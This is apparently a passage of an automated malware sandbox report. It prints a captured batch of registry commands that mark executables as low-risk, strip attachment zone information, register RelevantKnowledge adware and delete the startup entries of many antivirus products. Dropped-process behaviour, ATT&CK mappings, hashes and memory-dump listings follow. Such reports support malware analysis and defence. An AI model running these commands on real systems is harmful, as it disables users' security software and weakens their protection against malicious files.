"http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f ) else ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg64.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlservice.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -boot" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 )
4⤵
PID:3844

C:\Users\Admin\AppData\Local\Temp\3153.exe
C:\Users\Admin\AppData\Local\Temp\3153.exe
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2972

C:\Windows\SysWOW64\cmd.exe
cmd /Q /C C:\Users\Admin\AppData\Local\Temp/s.bat
2⤵
- Drops startup file
PID:668

C:\Users\Admin\AppData\Local\Temp\3403.exe
C:\Users\Admin\AppData\Local\Temp\3403.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3476

C:\Users\Admin\AppData\Local\Temp\3403.exe
C:\Users\Admin\AppData\Local\Temp\3403.exe
2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:208

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 208 -s 1460
3⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:1920

C:\Users\Admin\AppData\Local\Temp\3B96.exe
C:\Users\Admin\AppData\Local\Temp\3B96.exe
1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:2100

C:\Users\Admin\AppData\Local\Temp\936B.exe
C:\Users\Admin\AppData\Local\Temp\936B.exe
1⤵
- Executes dropped EXE
PID:1640

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1640 -s 732
2⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:2152

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1640 -s 744
2⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:3000

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1640 -s 844
2⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:2416

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1640 -s 880
2⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:4084

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1640 -s 820
2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:3628

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:1924

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:196

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:3464

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:1320

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:3008

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:2432

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:2856

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:3728

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:2080

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Runtimebroker.exe
MD5
16e7880b76dbc82d50fd96f38d1c2692

SHA1
b8b49ef406f74e50c7386f2fecbff18447ad9f4d

SHA256
9ccef739ddc3b6688be2a72a754c95f300f24d3b5181a3896328681bf933b4d7

SHA512
69071850ce17baaa5884f9531e2c7632b61a5777d58b826b1365d6f651f647a3521d456ceed29fbf5cf47ebf83176634371e7e5245a44d4b13b0855ffe10d6e3

Download Submit
C:\ProgramData\Runtimebroker.exe
MD5
16e7880b76dbc82d50fd96f38d1c2692

SHA1
b8b49ef406f74e50c7386f2fecbff18447ad9f4d

SHA256
9ccef739ddc3b6688be2a72a754c95f300f24d3b5181a3896328681bf933b4d7

SHA512
69071850ce17baaa5884f9531e2c7632b61a5777d58b826b1365d6f651f647a3521d456ceed29fbf5cf47ebf83176634371e7e5245a44d4b13b0855ffe10d6e3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
MD5
6bf0e5945fb9da68e1b03bdaed5f6f8d

SHA1
eed3802c8e4abe3b327c100c99c53d3bbcf8a33d

SHA256
dda58fd16fee83a65c05936b1a070187f2c360024650ecaf857c5e060a6a55f1

SHA512
977a393fdad2b162aa42194ddad6ec8bcab24f81980ff01b1c22c4d59ac268bb5ce947105c968de1a8a66b35023280a1e7709dfea5053385f87141389ebecb25

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
8ce78b13ac7c4c69c41d65af180d51c1

SHA1
8d59540790dfb716c1580aa5ec0e1ffb26ad3eed

SHA256
f285de202c983c211c0dcc3e3baa4293b9f1d94272552b75840d7ffdec9ed443

SHA512
c9b95a1475c98764a5fc11c309dbfa53237323ab52681a3ab65583f234eb82bc52ae87ddd845d334c1b7124c460a8c52f4efad287054e6d93916d5807240271e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
f1b160ab95f106dd13dfcf8d05e0b976

SHA1
eb5639c4e3ac2dc464b5b0ca0b803127b4d24bcf

SHA256
e4059ef810c98d6328d0cc37d3fca5a88549044a3fce535db1e027d4067e0168

SHA512
9c34285d084563ce73d5edf539d186e8c07ce357af46c4ee0b9ae5dbf11a4ddb1be3c1177d0a91169d205e5fb1383590f977657c102f4a9de115bd217a9856e1

Download Submit
C:\Users\Admin\AppData\Local\Temp\2EF0.exe
MD5
16e7880b76dbc82d50fd96f38d1c2692

SHA1
b8b49ef406f74e50c7386f2fecbff18447ad9f4d

SHA256
9ccef739ddc3b6688be2a72a754c95f300f24d3b5181a3896328681bf933b4d7

SHA512
69071850ce17baaa5884f9531e2c7632b61a5777d58b826b1365d6f651f647a3521d456ceed29fbf5cf47ebf83176634371e7e5245a44d4b13b0855ffe10d6e3

Download Submit
C:\Users\Admin\AppData\Local\Temp\2EF0.exe
MD5
16e7880b76dbc82d50fd96f38d1c2692

SHA1
b8b49ef406f74e50c7386f2fecbff18447ad9f4d

SHA256
9ccef739ddc3b6688be2a72a754c95f300f24d3b5181a3896328681bf933b4d7

SHA512
69071850ce17baaa5884f9531e2c7632b61a5777d58b826b1365d6f651f647a3521d456ceed29fbf5cf47ebf83176634371e7e5245a44d4b13b0855ffe10d6e3

Download Submit
C:\Users\Admin\AppData\Local\Temp\3153.exe
MD5
b19ac380411ed5d8b5a7e7e0c1da61a6

SHA1
9665c20336a5ce437bbf7b564370bfa43e99954c

SHA256
aba88a19b2f6e2cf9a6a41ab8661d83c433acec363028f58dd74d37e335c7619

SHA512
73b4e3555cf9496a7138a2c7071ed81a754493afaf15f604a305f3eb051ed72645731a6174b0934f24371dbe5bd8c0185516f87778a018d84df4fff8aea0c208

Download Submit
C:\Users\Admin\AppData\Local\Temp\3153.exe
MD5
b19ac380411ed5d8b5a7e7e0c1da61a6

SHA1
9665c20336a5ce437bbf7b564370bfa43e99954c

SHA256
aba88a19b2f6e2cf9a6a41ab8661d83c433acec363028f58dd74d37e335c7619

SHA512
73b4e3555cf9496a7138a2c7071ed81a754493afaf15f604a305f3eb051ed72645731a6174b0934f24371dbe5bd8c0185516f87778a018d84df4fff8aea0c208

Download Submit
C:\Users\Admin\AppData\Local\Temp\3403.exe
MD5
5707ddada5b7ea6bef434cd294fa12e1

SHA1
45bb285a597b30e100ed4b15d96a29d718697e5e

SHA256
85205aa3ad824b5172d5da841d253c3a54aff5d00eb2c208029e9453008f132c

SHA512
91cbdbf8da7e4e34de45a99359bdc321a66d6646ed14a1042346824c8daa6237281eff3b00fd162009c5e3204e5a7cd3b944f05e18b7f9066d0f9dd16b56bf13

Download Submit
C:\Users\Admin\AppData\Local\Temp\3403.exe
MD5
5707ddada5b7ea6bef434cd294fa12e1

SHA1
45bb285a597b30e100ed4b15d96a29d718697e5e

SHA256
85205aa3ad824b5172d5da841d253c3a54aff5d00eb2c208029e9453008f132c

SHA512
91cbdbf8da7e4e34de45a99359bdc321a66d6646ed14a1042346824c8daa6237281eff3b00fd162009c5e3204e5a7cd3b944f05e18b7f9066d0f9dd16b56bf13

Download Submit
C:\Users\Admin\AppData\Local\Temp\3403.exe
MD5
5707ddada5b7ea6bef434cd294fa12e1

SHA1
45bb285a597b30e100ed4b15d96a29d718697e5e

SHA256
85205aa3ad824b5172d5da841d253c3a54aff5d00eb2c208029e9453008f132c

SHA512
91cbdbf8da7e4e34de45a99359bdc321a66d6646ed14a1042346824c8daa6237281eff3b00fd162009c5e3204e5a7cd3b944f05e18b7f9066d0f9dd16b56bf13

Download Submit
C:\Users\Admin\AppData\Local\Temp\3B96.exe
MD5
717d65dba56f47e540dca074c3977b3d

SHA1
d58aa30f826f41663e693f0ad930fdce584f1672

SHA256
61fb1160ae372d9ba1c95400d5439450c6a66cdf073fa50ee2d5d10c4952cbb3

SHA512
b06e4358411eb8f6315c574922c021bd57218b3e6a0ed727df6b44e20e7818d40fb0347050ce9145ea7e0fd56a7fa93a2358e524c0df030d6d44067c7c83510d

Download Submit
C:\Users\Admin\AppData\Local\Temp\3B96.exe
MD5
717d65dba56f47e540dca074c3977b3d

SHA1
d58aa30f826f41663e693f0ad930fdce584f1672

SHA256
61fb1160ae372d9ba1c95400d5439450c6a66cdf073fa50ee2d5d10c4952cbb3

SHA512
b06e4358411eb8f6315c574922c021bd57218b3e6a0ed727df6b44e20e7818d40fb0347050ce9145ea7e0fd56a7fa93a2358e524c0df030d6d44067c7c83510d

Download Submit
C:\Users\Admin\AppData\Local\Temp\936B.exe
MD5
4297e9e27602c1ab910f6c214a2b3ce7

SHA1
a2ee7d601157c05818a3fd2dd46e51b272078b95

SHA256
c6ce666831320963b654b1730a946524fb370c4d7a41822deee3bbe6f367fb8d

SHA512
a0e4e3a61e564b27d86683a56b54b9305d6566a0388d33c05644b88a5fb071e99e8bb1972a9e05cd2fe963420a0a9a45a61a8de6709914be3d9d8982916759e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\936B.exe
MD5
4297e9e27602c1ab910f6c214a2b3ce7

SHA1
a2ee7d601157c05818a3fd2dd46e51b272078b95

SHA256
c6ce666831320963b654b1730a946524fb370c4d7a41822deee3bbe6f367fb8d

SHA512
a0e4e3a61e564b27d86683a56b54b9305d6566a0388d33c05644b88a5fb071e99e8bb1972a9e05cd2fe963420a0a9a45a61a8de6709914be3d9d8982916759e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\s.bat
MD5
469602cbc560ba3db0b148b419ee102b

SHA1
6aab3456fd5f51baba8985de261b706d14ec548b

SHA256
817257701107988072eeb51bf3bafd8abe7b64b09b86f2c14547c4a6cc6fba9e

SHA512
2979f142438ba760c08c9d6af3af60186e0d6b1fe7e6436ffac368b5902729c9ceb351cf85e097b8c594a376f686b7e276305eac08b04624d747b15d17b4a3fd

Download Submit
\Users\Admin\AppData\LocalLow\sqlite3.dll
MD5
f964811b68f9f1487c2b41e1aef576ce

SHA1
b423959793f14b1416bc3b7051bed58a1034025f

SHA256
83bc57dcf282264f2b00c21ce0339eac20fcb7401f7c5472c0cd0c014844e5f7

SHA512
565b1a7291c6fcb63205907fcd9e72fc2e11ca945afc4468c378edba882e2f314c2ac21a7263880ff7d4b84c2a1678024c1ac9971ac1c1de2bfa4248ec0f98c4

Download Submit
memory/196-214-0x0000000000000000-mapping.dmp

Download
memory/196-221-0x0000000000BE0000-0x0000000000BE7000-memory.dmp

Filesize
28KB

Download
memory/196-222-0x0000000000BD0000-0x0000000000BDC000-memory.dmp

Filesize
48KB

Download
memory/208-124-0x0000000002DD0000-0x0000000002F1A000-memory.dmp

Filesize
1.3MB

Download
memory/208-181-0x0000000000400000-0x0000000000495000-memory.dmp

Filesize
596KB

Download
memory/208-132-0x0000000000400000-0x0000000002C7D000-memory.dmp

Filesize
40.5MB

Download
memory/208-182-0x000000000044003F-mapping.dmp

Download
memory/208-118-0x0000000000000000-mapping.dmp

Download
memory/208-184-0x0000000000400000-0x0000000000495000-memory.dmp

Filesize
596KB

Download
memory/668-157-0x0000000000000000-mapping.dmp

Download
memory/680-213-0x00000000079E0000-0x00000000079E1000-memory.dmp

Filesize
4KB

Download
memory/680-209-0x0000000004680000-0x0000000004681000-memory.dmp

Filesize
4KB

Download
memory/680-232-0x00000000097B0000-0x00000000097B1000-memory.dmp

Filesize
4KB

Download
memory/680-237-0x0000000004683000-0x0000000004684000-memory.dmp

Filesize
4KB

Download
memory/680-239-0x0000000009320000-0x000000000947B000-memory.dmp

Filesize
1.4MB

Download
memory/680-208-0x0000000004682000-0x0000000004683000-memory.dmp

Filesize
4KB

Download
memory/680-201-0x0000000000000000-mapping.dmp

Download
memory/1320-171-0x0000000006C60000-0x0000000006C61000-memory.dmp

Filesize
4KB

Download
memory/1320-173-0x00000000074E0000-0x00000000074E1000-memory.dmp

Filesize
4KB

Download
memory/1320-192-0x00000000088F0000-0x00000000088F1000-memory.dmp

Filesize
4KB

Download
memory/1320-191-0x0000000007CA0000-0x0000000007CA1000-memory.dmp

Filesize
4KB

Download
memory/1320-190-0x0000000008970000-0x0000000008971000-memory.dmp

Filesize
4KB

Download
memory/1320-177-0x0000000006CD0000-0x0000000006CD1000-memory.dmp

Filesize
4KB

Download
memory/1320-236-0x0000000000600000-0x000000000060F000-memory.dmp

Filesize
60KB

Download
memory/1320-235-0x0000000000610000-0x0000000000619000-memory.dmp

Filesize
36KB

Download
memory/1320-206-0x00000000066B3000-0x00000000066B4000-memory.dmp

Filesize
4KB

Download
memory/1320-162-0x0000000000000000-mapping.dmp

Download
memory/1320-234-0x0000000000000000-mapping.dmp

Download
memory/1320-166-0x00000000064E0000-0x00000000064E1000-memory.dmp

Filesize
4KB

Download
memory/1320-167-0x0000000006CF0000-0x0000000006CF1000-memory.dmp

Filesize
4KB

Download
memory/1320-168-0x00000000066B0000-0x00000000066B1000-memory.dmp

Filesize
4KB

Download
memory/1320-169-0x00000000066B2000-0x00000000066B3000-memory.dmp

Filesize
4KB

Download
memory/1320-170-0x0000000006AE0000-0x0000000006AE1000-memory.dmp

Filesize
4KB

Download
memory/1396-154-0x0000000000400000-0x0000000002C7D000-memory.dmp

Filesize
40.5MB

Download
memory/1396-150-0x0000000000000000-mapping.dmp

Download
memory/1396-153-0x0000000002CC0000-0x0000000002CFB000-memory.dmp

Filesize
236KB

Download
memory/1640-220-0x00000000048A0000-0x0000000004931000-memory.dmp

Filesize
580KB

Download
memory/1640-223-0x0000000000400000-0x0000000002CA9000-memory.dmp

Filesize
40.7MB

Download
memory/1640-197-0x0000000000000000-mapping.dmp

Download
memory/1872-115-0x0000000000402E1A-mapping.dmp

Download
memory/1872-114-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/1924-287-0x000000007E520000-0x000000007E521000-memory.dmp

Filesize
4KB

Download
memory/1924-219-0x0000000000A00000-0x0000000000A6B000-memory.dmp

Filesize
428KB

Download
memory/1924-270-0x0000000008CC0000-0x0000000008CF3000-memory.dmp

Filesize
204KB

Download
memory/1924-255-0x0000000000D22000-0x0000000000D23000-memory.dmp

Filesize
4KB

Download
memory/1924-254-0x0000000000D20000-0x0000000000D21000-memory.dmp

Filesize
4KB

Download
memory/1924-242-0x0000000000000000-mapping.dmp

Download
memory/1924-200-0x0000000000000000-mapping.dmp

Download
memory/1924-290-0x0000000000D23000-0x0000000000D24000-memory.dmp

Filesize
4KB

Download
memory/1924-218-0x0000000000A70000-0x0000000000AE4000-memory.dmp

Filesize
464KB

Download
memory/2080-285-0x0000000000000000-mapping.dmp

Download
memory/2080-288-0x0000000000F00000-0x0000000000F05000-memory.dmp

Filesize
20KB

Download
memory/2080-289-0x0000000000EF0000-0x0000000000EF9000-memory.dmp

Filesize
36KB

Download
memory/2100-145-0x0000000005060000-0x0000000005061000-memory.dmp

Filesize
4KB

Download
memory/2100-149-0x0000000005120000-0x0000000005121000-memory.dmp

Filesize
4KB

Download
memory/2100-176-0x0000000006B30000-0x0000000006B31000-memory.dmp

Filesize
4KB

Download
memory/2100-174-0x0000000006A30000-0x0000000006A31000-memory.dmp

Filesize
4KB

Download
memory/2100-164-0x00000000067F0000-0x00000000067F1000-memory.dmp

Filesize
4KB

Download
memory/2100-160-0x0000000006C00000-0x0000000006C01000-memory.dmp

Filesize
4KB

Download
memory/2100-159-0x0000000006500000-0x0000000006501000-memory.dmp

Filesize
4KB

Download
memory/2100-141-0x00000000772E0000-0x000000007746E000-memory.dmp

Filesize
1.6MB

Download
memory/2100-142-0x0000000000210000-0x0000000000211000-memory.dmp

Filesize
4KB

Download
memory/2100-135-0x0000000000000000-mapping.dmp

Download
memory/2100-148-0x00000000052C0000-0x00000000052C1000-memory.dmp

Filesize
4KB

Download
memory/2100-147-0x0000000005130000-0x0000000005131000-memory.dmp

Filesize
4KB

Download
memory/2100-144-0x0000000005740000-0x0000000005741000-memory.dmp

Filesize
4KB

Download
memory/2100-146-0x00000000050C0000-0x00000000050C1000-memory.dmp

Filesize
4KB

Download
memory/2432-258-0x00000000004C0000-0x00000000004CC000-memory.dmp

Filesize
48KB

Download
memory/2432-256-0x00000000004D0000-0x00000000004D6000-memory.dmp

Filesize
24KB

Download
memory/2432-247-0x0000000000000000-mapping.dmp

Download
memory/2856-259-0x0000000000000000-mapping.dmp

Download
memory/2856-262-0x0000000003720000-0x0000000003724000-memory.dmp

Filesize
16KB

Download
memory/2856-265-0x0000000003710000-0x0000000003719000-memory.dmp

Filesize
36KB

Download
memory/2972-139-0x0000000000400000-0x0000000002D86000-memory.dmp

Filesize
41.5MB

Download
memory/2972-156-0x0000000000400000-0x0000000002D86000-memory.dmp

Filesize
41.5MB

Download
memory/2972-138-0x00000000033E0000-0x0000000003623000-memory.dmp

Filesize
2.3MB

Download
memory/2972-121-0x0000000000000000-mapping.dmp

Download
memory/2972-155-0x00000000051E0000-0x00000000053F1000-memory.dmp

Filesize
2.1MB

Download
memory/3008-240-0x0000000000CA0000-0x0000000000CA5000-memory.dmp

Filesize
20KB

Download
memory/3008-241-0x0000000000C90000-0x0000000000C99000-memory.dmp

Filesize
36KB

Download
memory/3008-238-0x0000000000000000-mapping.dmp

Download
memory/3016-117-0x00000000012D0000-0x00000000012E6000-memory.dmp

Filesize
88KB

Download
memory/3128-116-0x0000000000030000-0x000000000003A000-memory.dmp

Filesize
40KB

Download
memory/3464-230-0x0000000001030000-0x000000000103B000-memory.dmp

Filesize
44KB

Download
memory/3464-228-0x0000000001040000-0x0000000001047000-memory.dmp

Filesize
28KB

Download
memory/3464-225-0x0000000000000000-mapping.dmp

Download
memory/3476-130-0x0000000005760000-0x0000000005761000-memory.dmp

Filesize
4KB

Download
memory/3476-131-0x0000000005160000-0x0000000005161000-memory.dmp

Filesize
4KB

Download
memory/3476-179-0x0000000005130000-0x0000000005151000-memory.dmp

Filesize
132KB

Download
memory/3476-128-0x0000000000760000-0x0000000000761000-memory.dmp

Filesize
4KB

Download
memory/3476-125-0x0000000000000000-mapping.dmp

Download
memory/3476-133-0x0000000005260000-0x000000000575E000-memory.dmp

Filesize
5.0MB

Download
memory/3476-134-0x00000000050F0000-0x00000000050F1000-memory.dmp

Filesize
4KB

Download
memory/3728-283-0x0000000000CA0000-0x0000000000CA5000-memory.dmp

Filesize
20KB

Download
memory/3728-286-0x0000000000C90000-0x0000000000C99000-memory.dmp

Filesize
36KB

Download
memory/3728-263-0x0000000000000000-mapping.dmp

Download
memory/3844-508-0x0000000000000000-mapping.dmp

Download